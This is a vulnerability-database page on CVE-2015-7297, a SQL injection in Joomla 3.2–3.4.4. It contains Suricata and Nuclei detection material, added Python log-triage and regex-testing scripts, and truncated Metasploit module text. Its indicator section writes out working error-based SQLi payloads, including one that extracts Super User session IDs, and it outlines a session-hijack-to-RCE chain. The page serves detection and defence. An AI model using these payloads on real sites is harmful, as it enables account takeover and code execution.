CVE-2015-7297
Published 2015-10-29
Priority P2 · 74 · high · 7.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Exploit: public exploit available
EPSS: 99.97% (100.0th percentile)
SQL injection vulnerability in Joomla! 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands via unspecified vectors, a different vulnerability than CVE-2015-7858.
Affected
15 ranges listed; the per-range entries carry no version bounds on this page, so the single row below takes its values from the description and the vendor advisory (3.2 through 3.4.4, fixed in 3.4.5).
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| joomla | joomla_! | 3.2 through 3.4.4 | 3.4.5 |
Detection & IOCs (extracted from sources)
- url: /index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5({{num}})),1)
- command: GET /index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]= (select 1 FROM(select count(*),concat((select (select concat(session_id)) FROM #{tableprefix}session WHERE data LIKE '%Super User%' AND data NOT LIKE '%IS NOT NULL%' AND userid!='0' AND username IS NOT NULL LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
- path: /index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=
- nuclei (request and matcher block of the template; the feed mislabels it as "yara"):

```yaml
id: CVE-2015-7297
http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5({{num}})),1)"
    matchers:
      - type: word
        part: body
        words:
          - '{{md5({{num}})}}'
```

- The exploit targets the com_contenthistory component via the list[select] GET parameter with error-based or UNION-based SQL injection payloads. Look for HTTP GET requests to /index.php with option=com_contenthistory and a non-empty list[select] parameter.
- Post-exploitation creates a random-named PHP file in a Joomla template directory via com_templates and then requests it for RCE. Monitor for POST requests to /administrator/index.php?option=com_templates&task=template.createFile.
- The exploit confirms vulnerability and extracts the table prefix by checking for a 500 error response containing a backtick-wrapped table name matching the pattern `(.*)_ucm_history`.
- Session hijacking is confirmed when the 500 error response body contains 'Duplicate entry' followed by a hex session ID. Monitor for this pattern in Joomla error responses.
- The SQL injection payload uses an error-based technique with updatexml() or floor(rand(0)*2) GROUP BY; the exact payload varies with the database configuration and the table prefix, which is retrieved dynamically during exploitation.
- Affected versions are Joomla 3.2 through 3.4.4 only; version 3.4.5 contains the security fix.
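The indicators above, turned into triage code. This is an added example, not code from the page, from Joomla or from the Metasploit modules; it assumes combined-format access logs, and the log lines, error bodies, table prefix (k3x9_) and session ID in it are constructed. The session-ID extractor assumes the floor(rand(0)*2) GROUP BY payload from the command IOC, whose duplicate group key is the session ID with a trailing 1 appended.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Combined/common access-log line: ip, timestamp, method, uri, status (assumed format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)

# A backtick-wrapped `<prefix>_ucm_history` in a 500 body leaks the table prefix.
PREFIX_RE = re.compile(r"`([A-Za-z0-9_]+?)_ucm_history`")

# With the floor(rand(0)*2) GROUP BY payload the duplicate group key is
# <session_id> + '1', reported as "Duplicate entry '<session_id>1' for key ...".
# The regex drops that trailing digit (assumption tied to that payload).
DUP_RE = re.compile(r"Duplicate entry '([0-9a-f]+)1' for key")


def _first(qs, key):
    return qs.get(key, [""])[0]


def classify_request(method, uri):
    """Tag a request by the page's indicators; None when nothing matches."""
    parts = urlsplit(uri)
    qs = parse_qs(parts.query, keep_blank_values=True)
    option = _first(qs, "option")
    # Indicator 1: com_contenthistory with a non-empty list[select] parameter.
    if parts.path.endswith("/index.php") and option == "com_contenthistory":
        if _first(qs, "list[select]").strip():
            return "contenthistory_sqli"
    # Indicator 2: backend template-file creation used for post-exploitation RCE.
    if (method == "POST" and parts.path.endswith("/administrator/index.php")
            and option == "com_templates"
            and _first(qs, "task") == "template.createFile"):
        return "templates_createfile"
    return None


def triage_log(text):
    """Return (ip, tag, status) for every log line that matches an indicator."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        tag = classify_request(m["method"], m["uri"])
        if tag:
            hits.append((m["ip"], tag, m["status"]))
    return hits


def table_prefix_from_error(body):
    """Extract the Joomla table prefix (with its underscore) from a 500 body."""
    m = PREFIX_RE.search(body)
    return m.group(1) + "_" if m else None


def session_id_from_error(body):
    """Extract a leaked session ID from a 'Duplicate entry' error body."""
    m = DUP_RE.search(body)
    return m.group(1) if m else None


# Constructed samples (not real traffic or real Joomla output).
SAMPLE_LOG = """\
203.0.113.7 - - [29/Oct/2015:10:01:02 +0000] "GET /index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5(1234)),1) HTTP/1.1" 500 2311
198.51.100.4 - - [29/Oct/2015:10:03:10 +0000] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 8120
203.0.113.7 - - [29/Oct/2015:10:04:44 +0000] "GET /index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]= HTTP/1.1" 200 5400
203.0.113.7 - - [29/Oct/2015:10:05:30 +0000] "POST /administrator/index.php?option=com_templates&task=template.createFile&id=504&file=home HTTP/1.1" 303 0
"""
SAMPLE_500_PREFIX = ("Unknown column 'foo' in 'field list' SQL=SELECT foo FROM "
                     "`k3x9_ucm_history` AS h WHERE h.ucm_item_id = 1")
SAMPLE_500_DUP = ("Duplicate entry '5f9c2e1a7b3d4c6e8f0a1b2c3d1' for key 'group_key' "
                  "SQL=SELECT (select 1 FROM(select count(*),concat(")

if __name__ == "__main__":
    for hit in triage_log(SAMPLE_LOG):
        print(hit)
    print(table_prefix_from_error(SAMPLE_500_PREFIX))
    print(session_id_from_error(SAMPLE_500_DUP))
```

The third log line is the legitimate shape of the request (empty list[select]) and is deliberately not flagged; anything non-empty in that parameter is the signal, because the Nuclei payload contains no SQL keyword a generic SQLi signature would key on.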
CVSS provenance
NVD (v2.0): 7.5 HIGH, AV:N/AC:L/Au:N/C:P/I:P/A:P
VulnCheck: 7.5 HIGH
GHSA
GHSA-66q2-64c3-859x: SQL injection vulnerability in Joomla! 3
ghsa_unreviewed · 2022-05-17 · CVSS 7.5 · HIGH · CWE-89 (filed under the sibling CVE-2015-7858)
SQL injection vulnerability in Joomla! 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands via unspecified vectors, a different vulnerability than CVE-2015-7297.
GHSA
GHSA-5j7c-6v58-rh4x: SQL injection vulnerability in Joomla! 3
ghsa_unreviewed · 2022-05-17 · CVSS 7.5 · HIGH · CWE-89 (CVE-2015-7297)
SQL injection vulnerability in Joomla! 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands via unspecified vectors, a different vulnerability than CVE-2015-7858.
VulnCheck
Joomla! Joomla! Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
vulncheck · 2015 · CVSS 7.5 · HIGH (filed under the sibling CVE-2015-7858)
SQL injection vulnerability in Joomla! 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands via unspecified vectors, a different vulnerability than CVE-2015-7297.
Affected: Joomla! Joomla!
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://blog.sucuri.net/2015/10/joomla-sql-injection-attacks-in-the-wild.html
Exploit PoC: https://vulncheck.com/xdb/9eabb1cd63ab
Suricata
ET WEB_SPECIFIC_APPS Possible Joomla SQLi Attempt (CVE-2015-7297 CVE-2015-7857 CVE-2015-7858)
suricata · 2015-10-22 · CVSS 7.5 · HIGH
Rule (cut off on this page inside the http.header_names check): alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Possible Joomla SQLi Attempt (CVE-2015-7297 CVE-2015-7857 CVE-2015-7858)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"option="; nocase; content:"view="; nocase; content:"list[select]="; nocase; fast_pattern; pcre:"/&list\[select\]=[^\r\n&]*(?:(?:S(?:HOW (?:C(?:UR(?:DAT|TIM)E|HARACTER SET)|(?:VARI|T)ABLES)|ELECT (?:FROM|USER))|U(?:NION SELEC|PDATE SE)T|DELETE FROM|INSERT INTO)|S(?:HOW.+(?:C(?:HARACTER.+SET|UR(DATE|TIME))|(?:VARI|T)ABLES)|ELECT.+(?:FROM|USER))|U(?:NION.+SELEC|PDATE.+SE)T|DELETE.+FROM|INSERT.+INTO|\/\*.+\*\/)?/i"; http.header_names; to_lowercase; content:!"|0d 0a|refere
Note on the pcre: the whole SQL-keyword alternation sits in a group that ends in `)?`, so it is optional and the pcre matches any URI containing `&list[select]=`, with or without a keyword. The rule's selectivity therefore comes from the three content matches on the URI and the (truncated) negative header-names match, not from the keyword list; in exchange it also catches keyword-free payloads such as the updatexml() check above.
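The pcre from the rule above run against sample request URIs, as an added example (not part of the ET rule or of this page). The URIs are built from the IOCs on this page with the {{num}} and #{tableprefix} placeholders filled with made-up values, plus an empty list[select]= as a benign control; the "tightened" pattern is a hypothetical variant that drops the trailing `?` so the keyword group becomes mandatory.

```python
import re

# The pcre exactly as written in the rule; the trailing /i flag becomes re.I.
ET_PCRE = re.compile(
    r"&list\[select\]=[^\r\n&]*(?:(?:S(?:HOW (?:C(?:UR(?:DAT|TIM)E|HARACTER SET)|(?:VARI|T)ABLES)|ELECT (?:FROM|USER))|U(?:NION SELEC|PDATE SE)T|DELETE FROM|INSERT INTO)|S(?:HOW.+(?:C(?:HARACTER.+SET|UR(DATE|TIME))|(?:VARI|T)ABLES)|ELECT.+(?:FROM|USER))|U(?:NION.+SELEC|PDATE.+SE)T|DELETE.+FROM|INSERT.+INTO|\/\*.+\*\/)?",
    re.I,
)

# Hypothetical tightened variant (not an ET rule): the same pattern with the
# final "?" removed, so the keyword alternation must actually match.
TIGHT_PCRE = re.compile(ET_PCRE.pattern[:-1], re.I)

# Constructed URIs. 1234 stands in for the Nuclei {{num}} value and k3x9_ for
# the dynamically retrieved Metasploit #{tableprefix}; neither value is real.
BASE = ("/index.php?option=com_contenthistory&view=history&list[ordering]="
        "&item_id=1&type_id=1&list[select]=")
SAMPLES = {
    "updatexml error-based (Nuclei check)": BASE + "updatexml(0x23,concat(1,md5(1234)),1)",
    "floor(rand(0)*2) session dump (Metasploit)": BASE + (
        "(select 1 FROM(select count(*),concat((select (select concat(session_id)) "
        "FROM k3x9_session WHERE data LIKE '%Super User%' AND data NOT LIKE '%IS NOT NULL%' "
        "AND userid!='0' AND username IS NOT NULL LIMIT 0,1),floor(rand(0)*2))x "
        "FROM information_schema.tables GROUP BY x)a)"),
    "empty list[select] (control)": BASE,
}


def evaluate(samples=SAMPLES):
    """Map each sample name to (rule pcre matched, tightened pcre matched)."""
    return {
        name: (ET_PCRE.search(uri) is not None, TIGHT_PCRE.search(uri) is not None)
        for name, uri in samples.items()
    }


if __name__ == "__main__":
    for name, (rule, tight) in evaluate().items():
        print(f"{name:45s} rule={rule!s:5s} tightened={tight!s:5s}")
```

The rule's pcre fires on all three URIs, including the empty control. Making the keyword group mandatory silences the control but also misses the updatexml() payload, which contains no keyword from the list; a keyword-based pcre cannot separate these two cases, which is why the detection bullets above key on a non-empty list[select] instead.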
Exploit-DB
Joomla! 3.4.4 Component Content History - SQL Injection / Remote Code Execution (Metasploit)
exploitdb · 2015-11-23 (filed under CVE-2015-7858)
Module source as reproduced on this page (the class declaration is mangled and the listing stops at the license line):

```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 "Joomla Content History SQLi Remote Code Execution",
  'Description' => %q{
    This module exploits a SQL injection vulnerability found in Joomla versions
    3.2 up to 3.4.4. The vulnerability exists in the Content History administrator
    component in the core of Joomla. Triggering the SQL injection makes it possible
    to retrieve active Super User sessions. The cookie can be used to login to the
    Joomla administrator backend. By creating a new template file containing our
    payload, remote code execution is made possible.
  },
  'License
```
Metasploit
Joomla com_contenthistory Error-Based SQL Injection (auxiliary/gather/joomla_contenthistory_sqli)
This module exploits a SQL injection vulnerability in Joomla versions 3.2 through 3.4.4 in order to enumerate usernames and password hashes.
Metasploit
Joomla Content History SQLi Remote Code Execution (exploit/unix/webapp/joomla_contenthistory_sqli_rce)
This module exploits a SQL injection vulnerability found in Joomla versions 3.2 up to 3.4.4. The vulnerability exists in the Content History administrator component in the core of Joomla. Triggering the SQL injection makes it possible to retrieve active Super User sessions. The cookie can be used to log in to the Joomla administrator backend. By creating a new template file containing our payload, remote code execution is made possible.
Nuclei
Joomla! Core SQL Injection
nuclei · CVSS 7.5 · HIGH
A SQL injection vulnerability in Joomla! 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands.
Template (info block; the reference list is cut off on this page, and the request/matcher block is reproduced under Detection & IOCs above):

```yaml
id: CVE-2015-7297
info:
  name: Joomla! Core SQL Injection
  author: princechaddha
  severity: high
  description: A SQL injection vulnerability in Joomla! 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the Joomla! CMS.
  remediation: |
    Apply the latest security patches and updates provided by Joomla! to mitigate the SQL Injection vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2015-7297
    - http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html
    -
```
Qualys
Protect Against the Joomla SQL Injection Vulnerability | Qualys
blogs_qualys · 2015-10-28 · CVSS 7.5 · HIGH
A few days ago, SpiderLabs researcher Asaf Orpani disclosed an important vulnerability targeting Joomla, one of the most popular Content Management Systems (CMS). By exploiting this vulnerability, researchers were able to remotely gain full administrative access to the CMS.
Joomla versions 3.2 to 3.4.4 are affected by this major security issue. Since the vulnerability targets the core of the CMS, all websites based on Joomla are vulnerable, whatever the modules used.
Vulnerabilities discovered by Orpani are:
- CVE-2015-7297
- CVE-2015-7857
- CVE-2015-7858
Like WordPress did when its market-leading CMS was exposed to multiple vulnerabilities, Joomla has reacted by publishing a quick Security Fix version 3.4.5, which we encourage you to apply immediately.
What that story doesn't tell is
GreyNoise
NoiseLetter September 2024
blogs_greynoiseio
References
- http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html
- http://packetstormsecurity.com/files/134097/Joomla-3.44-SQL-Injection.html
- http://packetstormsecurity.com/files/134494/Joomla-Content-History-SQL-Injection-Remote-Code-Execution.html
- http://www.rapid7.com/db/modules/auxiliary/gather/joomla_contenthistory_sqli
- http://www.rapid7.com/db/modules/exploit/unix/webapp/joomla_contenthistory_sqli_rce
- http://www.securityfocus.com/bid/77295
- http://www.securitytracker.com/id/1033950
- https://www.exploit-db.com/exploits/38797/
- https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/
Published: 2015-10-29